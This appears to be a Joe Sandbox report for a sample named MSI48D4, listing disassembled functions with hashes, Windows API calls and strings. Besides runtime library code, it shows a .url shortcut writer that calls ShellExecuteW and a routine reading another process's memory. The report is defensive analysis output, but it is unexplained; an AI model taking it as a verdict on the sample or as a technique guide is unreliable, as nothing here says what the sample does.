Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
Instruction ID: 7e36f3db5b8fec15409121150bf68570e2d09b251d8f80b199945fb60c1b8998
Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
Instruction Fuzzy Hash: 50328C74E0021ADFCB28CF98C991ABEB7B5FF45304F284169DD95A7305D632AE46CB90

Function 00C492A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b7bd2d42b9bb3180a05e6d3fe44cc9a5897c06677da2d9f2d24915aca0e611
Instruction ID: 9d28b91fb0a4d901e121e8a2f3a13c389aef4cc8083b4af1a9e12c5da77d9a51
Opcode Fuzzy Hash: 59b7bd2d42b9bb3180a05e6d3fe44cc9a5897c06677da2d9f2d24915aca0e611
Instruction Fuzzy Hash: 1F321325D28F114DD7239634DC6233AA648EFB73C5F15D727E82AB5AA9EB38C9C34100

Function 00C3A915 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9095e229beb10356369c3710121689a8b6bcc523338ccd7872805602a1c13487
Instruction ID: c786f9e859db26141cbccfabf5fd907eea00ad88e19209dab6259f982098f2f1
Opcode Fuzzy Hash: 9095e229beb10356369c3710121689a8b6bcc523338ccd7872805602a1c13487
Instruction Fuzzy Hash: 29E1BD706207058FCB28CF68C580BAEB7F1FF49314F244659D4E6AB2A1D731AE52DB52

Function 00C3C2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
Instruction ID: 261adf1e9a7ac249a91b5c33de6813c9c82e34dd3cd9c2513f094275093588f2
Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
Instruction Fuzzy Hash: FC517172E00219AFDF14CF99C991AFEBBB2EF88310F598059E815BB241C7349E50DB91

Function 00C34920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7e3cd556d5f379095d22e18a15abb397fe4ff962408b12157a3fdc76399d7b63
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0D11C87722134243D61CC62ED8B47B7E79DEBC6325F2D436AD0A18B758D222BA459600

Function 00C4AD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction ID: 9db2dd2a4d4e82ab34d1ab0252e1f8a046724acdbce437acdc5e62efaf81990f
Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction Fuzzy Hash: 93E08C72911238EBCB14DBD8C904A8AF3ECFB88F01B15059AF901D3500C270DE00EBD1

Function 00C42DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
Instruction ID: 856d32c750921d15b49fbe89ac91cb08893f8751e061cd489fc9f7d285d36582
Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
Instruction Fuzzy Hash: B5C08C38840E0046CE2989108AB23A83354BB91782FC0058CD4130BA46C51EAD83E601

Function 00C16600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00C1667E
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00C166D7
LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00C166E2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00C166FE
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00C549E5,000000FF), ref: 00C167DB
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00C549E5,000000FF), ref: 00C167E7
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00C549E5), ref: 00C1682F
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00C549E5,000000FF), ref: 00C1684A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00C549E5), ref: 00C16867
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00C549E5,000000FF), ref: 00C16891
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00C168D8
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00C1692A
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00C549E5,000000FF), ref: 00C1695C

Strings

URL Shortcut content:, xrefs: 00C16875
[InternetShortcut]URL=, xrefs: 00C1670A
open, xrefs: 00C168D1, 00C168F0
-_.~!*'();:@&=+$,/?#[], xrefs: 00C16757, 00C1676E

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
API String ID: 2199533872-3004881174
Opcode ID: 28bf36ab01fcc2f89b7b79d9e343e9aec9cfa596895dfb35ba6ad57acc35b697
Instruction ID: f99af53ad42bf8e903d66b2f6680ff2cf47b4440c1fc344ff1e880e62f715dc6
Opcode Fuzzy Hash: 28bf36ab01fcc2f89b7b79d9e343e9aec9cfa596895dfb35ba6ad57acc35b697
Instruction Fuzzy Hash: 47B11471904249AFEB20CF68CC86BEFBBB5EF46700F144129E554AB2C1D7709A89D7E1

Function 00C32B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00C6DD3C,00000FA0,?,?,00C32B6A), ref: 00C32B98
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00C32B6A), ref: 00C32BA3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00C32B6A), ref: 00C32BB4
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C32BC6
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C32BD4
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00C32B6A), ref: 00C32BF7
DeleteCriticalSection.KERNEL32(00C6DD3C,00000007,?,?,00C32B6A), ref: 00C32C13
CloseHandle.KERNEL32(00000000,?,?,00C32B6A), ref: 00C32C23

Strings

kernel32.dll, xrefs: 00C32BAF
SleepConditionVariableCS, xrefs: 00C32BC0
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C32B9E
WakeAllConditionVariable, xrefs: 00C32BCC

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 87948ffa7565d985872d4aefc43c624f836f701c43669dfb41175c5cae0d1d87
Instruction ID: 8b8538909ae2687c2159509584451fad467535755d8353e1171c8fe98caf08ab
Opcode Fuzzy Hash: 87948ffa7565d985872d4aefc43c624f836f701c43669dfb41175c5cae0d1d87
Instruction Fuzzy Hash: 16019E79B54711ABDA212F65BC09B5E7BA8DF81B52B050921FD06F21A0DAB0C8C48670

Function 00C35CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00C35DAC
type_info::operator==.LIBVCRUNTIME ref: 00C35DCE
___TypeMatch.LIBVCRUNTIME ref: 00C35EDD
IsInExceptionSpec.LIBVCRUNTIME ref: 00C35FAF
_UnwindNestedFrames.LIBCMT ref: 00C36033
CallUnexpected.LIBVCRUNTIME ref: 00C3604E

Strings

csm, xrefs: 00C35E05
csm, xrefs: 00C35D59
csm, xrefs: 00C35CEC

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 768b5207a9851a60e312213012170355b91b6e8497e38937f022af36d1901cec
Instruction ID: 429c4a258da3411e93ae25ee89239c0f8d77f51eedeec3824110db4f099d51f6
Opcode Fuzzy Hash: 768b5207a9851a60e312213012170355b91b6e8497e38937f022af36d1901cec
Instruction Fuzzy Hash: 69B19A31920609EFCF29DFA4C9819AEBBB5FF18310F14805AF8256B252D731DA52DF91

Function 00C14270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,0EAD22C0,?,?,?), ref: 00C142D2
OpenProcess.KERNEL32(00000400,00000000,?,?,0EAD22C0,?,?,?), ref: 00C142F3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,0EAD22C0,?,?,?), ref: 00C14326
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,0EAD22C0,?,?,?), ref: 00C14337
CloseHandle.KERNEL32(00000000,?,0EAD22C0,?,?,?), ref: 00C14355
CloseHandle.KERNEL32(00000000,?,0EAD22C0,?,?,?), ref: 00C14371
CloseHandle.KERNEL32(00000000,?,0EAD22C0,?,?,?), ref: 00C14399
CloseHandle.KERNEL32(00000000,?,0EAD22C0,?,?,?), ref: 00C143B5
CloseHandle.KERNEL32(00000000,?,0EAD22C0,?,?,?), ref: 00C143D3
CloseHandle.KERNEL32(00000000,?,0EAD22C0,?,?,?), ref: 00C143EF

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CloseHandle$Process$OpenTimes
String ID:
API String ID: 1711917922-0
Opcode ID: ef4383d54220176b914ac74bfd09baf07a2d823ea04c2ce9ce60bd1ab710f6a9
Instruction ID: abab7a89bb9af9f35495453b80c6526e8b32d987f26b9fddf7fa2366be703553
Opcode Fuzzy Hash: ef4383d54220176b914ac74bfd09baf07a2d823ea04c2ce9ce60bd1ab710f6a9
Instruction Fuzzy Hash: 51517CB0D01218EFDB18CF98D984BEEBBB4AF49714F644219E520B72D0C7745A859BA4

Function 00C2BBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2BBC4

Part of subcall function 00C2254E: __EH_prolog3.LIBCMT ref: 00C22555
Part of subcall function 00C2254E: std::_Lockit::_Lockit.LIBCPMT ref: 00C2255F
Part of subcall function 00C2254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00C225D0

Strings

%m / %d / %y, xrefs: 00C2BCBB
%b %d %H : %M : %S %Y, xrefs: 00C2BE52
%H : %M : %S, xrefs: 00C2BD5D
%H : %M, xrefs: 00C2BD03
:AM:am:PM:pm, xrefs: 00C2BF2A
%I : %M : %S %p, xrefs: 00C2BF1F
%d / %m / %y, xrefs: 00C2BEFA

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1538362411-2891247106
Opcode ID: 0e0457537e6c91fdf54c7115ac147dd5e27bc11eff7323a776e91d018eb8ea6c
Instruction ID: 87d3ef110a7be57835fcaace6c7a247d820a68fbf773527db3d91388349644a4
Opcode Fuzzy Hash: 0e0457537e6c91fdf54c7115ac147dd5e27bc11eff7323a776e91d018eb8ea6c
Instruction Fuzzy Hash: CAB1BE7650011AAFCF19DFA8EE65DFE3BB9EB08300F054119FA16A6A51D731DE10EB60

Function 00C30C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C30CA4

Part of subcall function 00C19270: std::_Lockit::_Lockit.LIBCPMT ref: 00C192A0
Part of subcall function 00C19270: std::_Lockit::_Lockit.LIBCPMT ref: 00C192C2
Part of subcall function 00C19270: std::_Lockit::~_Lockit.LIBCPMT ref: 00C192EA
Part of subcall function 00C19270: std::_Lockit::~_Lockit.LIBCPMT ref: 00C19422

Strings

%m / %d / %y, xrefs: 00C30D9B
%b %d %H : %M : %S %Y, xrefs: 00C30F32
%H : %M : %S, xrefs: 00C30E3D
%H : %M, xrefs: 00C30DE3
:AM:am:PM:pm, xrefs: 00C3100A
%I : %M : %S %p, xrefs: 00C30FFF
%d / %m / %y, xrefs: 00C30FDA

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: 88705d140c196dc66175d76c5155becbb009778806491853f3d329fbf8c1ee0a
Instruction ID: 433caa24205564490abc11614727525b7cd45a6ce165c849f618c0660aeba01d
Opcode Fuzzy Hash: 88705d140c196dc66175d76c5155becbb009778806491853f3d329fbf8c1ee0a
Instruction Fuzzy Hash: 73B1BF7651020AAFCF29DFA8C9A9DFF3BB9FF08300F240519F956A6251D631DA50DB60

Function 00C2BF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2BF85

Part of subcall function 00C18610: std::_Lockit::_Lockit.LIBCPMT ref: 00C18657
Part of subcall function 00C18610: std::_Lockit::_Lockit.LIBCPMT ref: 00C18679
Part of subcall function 00C18610: std::_Lockit::~_Lockit.LIBCPMT ref: 00C186A1
Part of subcall function 00C18610: std::_Lockit::~_Lockit.LIBCPMT ref: 00C1880E

Strings

%m / %d / %y, xrefs: 00C2C07C
%b %d %H : %M : %S %Y, xrefs: 00C2C213
%H : %M : %S, xrefs: 00C2C11E
%H : %M, xrefs: 00C2C0C4
:AM:am:PM:pm, xrefs: 00C2C2EB
%I : %M : %S %p, xrefs: 00C2C2E0
%d / %m / %y, xrefs: 00C2C2BB

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: 548eb8a3159c6f5a9f2f9a830fe838319cdbbb901ae3adb8996e8cc99c3410c6
Instruction ID: aea7ed81a3bc09afdeb46edae00a33ecad3afc3c80c7c8909d8fbccb801fe5de
Opcode Fuzzy Hash: 548eb8a3159c6f5a9f2f9a830fe838319cdbbb901ae3adb8996e8cc99c3410c6
Instruction Fuzzy Hash: B2B1A07650011AEFCF19DFA8D9D6DFE3BB9EF09340F144519FA12A2A52D631CA10EB60

Function 00C28555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2855C
_Maklocstr.LIBCPMT ref: 00C285C5
_Maklocstr.LIBCPMT ref: 00C285D7
_Maklocchr.LIBCPMT ref: 00C285EF
_Maklocchr.LIBCPMT ref: 00C285FF
_Getvals.LIBCPMT ref: 00C28621

Part of subcall function 00C21CD4: _Maklocchr.LIBCPMT ref: 00C21D03
Part of subcall function 00C21CD4: _Maklocchr.LIBCPMT ref: 00C21D19

Strings

false, xrefs: 00C285C0
true, xrefs: 00C285D2

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: ca3cc6e06a163059ff07ba5bc9e1414a55c2c97d3a1cc9d72cd94bf05e6c97b4
Instruction ID: fc19799f76f697639c5667efd4112ae1c9f79936959aced7d783483cfa51b43a
Opcode Fuzzy Hash: ca3cc6e06a163059ff07ba5bc9e1414a55c2c97d3a1cc9d72cd94bf05e6c97b4
Instruction Fuzzy Hash: 912192B1D40324AADF14EFA5E885ADF7BB8AF05710F048016FD159F542DA709A44DBA1

Function 00C19730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00C19763

Part of subcall function 00C20C94: __EH_prolog3.LIBCMT ref: 00C20C9B
Part of subcall function 00C20C94: std::_Lockit::_Lockit.LIBCPMT ref: 00C20CA6
Part of subcall function 00C20C94: std::locale::_Setgloballocale.LIBCPMT ref: 00C20CC1
Part of subcall function 00C20C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00C20D17

std::_Lockit::_Lockit.LIBCPMT ref: 00C1978A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C197F0
std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00C1984A

Part of subcall function 00C1F57A: __EH_prolog3.LIBCMT ref: 00C1F581

LocalFree.KERNEL32(00000000,00000000,?,00C654B1,00000000), ref: 00C199BF
__cftoe.LIBCMT ref: 00C19B0B

Strings

bad locale name, xrefs: 00C198FF

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockitstd::locale::_$H_prolog3Lockit::_$FreeInitLocalLocimp::_Locinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
String ID: bad locale name
API String ID: 3578231455-1405518554
Opcode ID: 97c41070ba7d2aca2298fff94645cd37af68ba4cb12e06826afd5194d2f6f4d6
Instruction ID: be9c4611eeae987dc2a9343baa89321703cb82c817d599d301424d5ba7e41c1e
Opcode Fuzzy Hash: 97c41070ba7d2aca2298fff94645cd37af68ba4cb12e06826afd5194d2f6f4d6
Instruction Fuzzy Hash: 65F1C071D00248DFDF10CFA8C894BEEBBB5EF0A304F244169E815AB381E7359A85DB91

Function 00C13C20 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C136D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C13735
Part of subcall function 00C136D0: _wcschr.LIBVCRUNTIME ref: 00C137C6

GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00C13CA8
ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00C13D01
ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00C13D7A
ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00C13EB1
GetLastError.KERNEL32 ref: 00C13F34
FreeLibrary.KERNEL32(?), ref: 00C13F7B

Strings

NtQueryInformationProcess, xrefs: 00C13CA2

